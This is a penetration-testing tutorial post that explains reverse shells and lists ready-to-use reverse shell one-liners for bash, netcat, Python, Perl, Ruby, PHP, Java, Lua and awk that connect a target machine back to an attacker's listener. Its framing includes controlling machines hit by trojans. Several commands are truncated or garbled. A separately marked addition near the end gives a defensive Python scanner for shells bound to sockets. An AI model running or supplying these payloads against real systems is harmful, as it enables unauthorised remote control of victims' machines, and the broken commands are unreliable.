Penetration testing: N reverse shell methods

1, What is a reverse shell?

In a reverse shell, the control end listens on a TCP/UDP port, and the controlled end initiates a connection to that port and transfers the input and output of its command line to the control end.

The reverse shell is the counterpart of standard shells such as telnet and SSH. In essence, the client and server roles of the network connection are reversed.

2, Why use a reverse shell?

It is usually used when the controlled end is subject to firewall restrictions, insufficient permissions, occupied ports, and so on.
For example, suppose we attack a machine and open a port on it. The attacker then connects from his own machine to the target machine (target IP: target machine port). This is the conventional form, which we call a forward connection. Remote desktop, web services, ssh, telnet, etc. are all forward connections. Under what circumstances can a forward connection not be used?

There are the following situations:

  • A client has been hit by your web trojan, but it is on a LAN, and you can't connect to it directly.
  • The IP of the target machine changes dynamically, so you can't keep control of it continuously.
  • Due to restrictions such as a firewall, the other machine can only send requests and cannot receive them.
  • For viruses and Trojans, it is unknown when the victim will be infected, what the other party's network environment is, when the machine is switched on and off, and so on. Therefore, the best policy is to set up a server and let the malicious program connect to it actively.

With that, the reverse connection is easy to understand: the attacker specifies the server, and the victim host actively connects to the attacker's server program. This is called a reverse connection.

3, bash

Listen on a port on the attack host (the port is a port number on the attack host, and it must not already be in use):

nc -lvvp 1000

On the target host:

bash -i >& /dev/tcp/attack-host-IP/port 0>&1        // port is the port number of the attack host

4, nc (netcat) reverse shell

Perform port listening on the attack host:

nc -lvvp port        // port is the port number of the attack host, and this port number must not be in use


On the target host:

nc -e /bin/bash attack host ip port

5, Common script reverse shells

The scripts below are executed on the target host, where x.x.x.x is the IP of the attack host, and the relevant port must already be listening on the attack host. I won't repeat this for each one.

1. python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("x.x.x.x",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);["/bin/bash","-i"]);'

2. perl

Method 1:

perl -e 'use Socket;$i="";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Method 2:

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"x.x.x.x:5555");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;

3. Ruby

ruby -rsocket -e 'exit if fork;"","5555");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print}end'

4. PHP

php -r '$sock=fsockopen("",5555);exec("/bin/bash -i <&3 >&3 2>&3");'

5. Java

public class Revs {
    /**
     * @param args
     * @throws Exception
     */
    public static void main(String[] args) throws Exception {
        // TODO Auto-generated method stub
        Runtime r = Runtime.getRuntime();
        String cmd[]= {"/bin/bash","-c","exec 5<>/dev/tcp/x.x.x.x/5555;cat <&5 | while read line; do $line 2>&5 >&5; done"};
        Process p = r.exec(cmd);
    }
}

6. Lua

lua -e "require('socket');require('os');t=socket.tcp();t:connect('','5555');os.execute('/bin/sh -i <&3 >&3 2>&3');"

7. AWK rebound

The attack machine listens. After receiving the shell, you must not press Enter, otherwise the connection will be dropped.

awk 'BEGIN{s="/inet/tcp/0/";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}'
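
Seen from the defending host, most of the one-liners above (the bash, nc -e, python and PHP forms, for example) end in the same state: a shell process whose stdin, stdout and stderr are all one network socket. The following is an added detection example, not code from the original post; it walks /proc looking for that state. The function names, the shell-name list and the constructed sample tree used for offline runs are assumptions of this example.

```python
import os
import re
SOCKET_LINK = re.compile(r"^socket:\[(\d+)\]$")
SHELLS = {"sh", "bash", "dash", "zsh", "ksh"}  # assumed list, extend as needed

def stdio_socket_inode(fd_dir):
    """Return the socket inode if fds 0, 1 and 2 all point at one socket, else None."""
    inodes = set()
    for fd in ("0", "1", "2"):
        try:
            target = os.readlink(os.path.join(fd_dir, fd))
        except OSError:  # process exited, fd closed, or no permission
            return None
        m = SOCKET_LINK.match(target)
        if not m:        # a tty, pipe or file: not the pattern we look for
            return None
        inodes.add(m.group(1))
    return inodes.pop() if len(inodes) == 1 else None

def find_socket_shells(proc_root="/proc"):
    """List (pid, comm, inode) for shell processes whose stdio is a single socket."""
    hits = []
    for entry in sorted(e for e in os.listdir(proc_root) if e.isdigit()):
        base = os.path.join(proc_root, entry)
        inode = stdio_socket_inode(os.path.join(base, "fd"))
        if inode is None:
            continue
        try:
            with open(os.path.join(base, "comm")) as f:
                name = f.read().strip()
        except OSError:
            continue
        if name in SHELLS:
            hits.append((int(entry), name, inode))
    return hits

def build_sample_proc(root, procs):
    """Constructed sample data: write a minimal fake /proc tree for offline runs."""
    for pid, (name, links) in procs.items():
        fd_dir = os.path.join(root, str(pid), "fd")
        os.makedirs(fd_dir)
        for fd, target in enumerate(links):
            os.symlink(target, os.path.join(fd_dir, str(fd)))  # dangling link, like /proc
        with open(os.path.join(root, str(pid), "comm"), "w") as f:
            f.write(name + "\n")

if __name__ == "__main__":
    for pid, name, inode in find_socket_shells():
        print(f"pid={pid} comm={name} stdio=socket:[{inode}]")
```

Reading other users' /proc/<pid>/fd entries needs root. The piped Java and awk variants do not leave the shell's stdio on a socket, and a shell legitimately started from an inetd-style service can also match, so treat hits as leads to triage.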

Tags: Linux Operation & Maintenance server

Posted on Fri, 26 Nov 2021 09:47:58 -0500 by jaql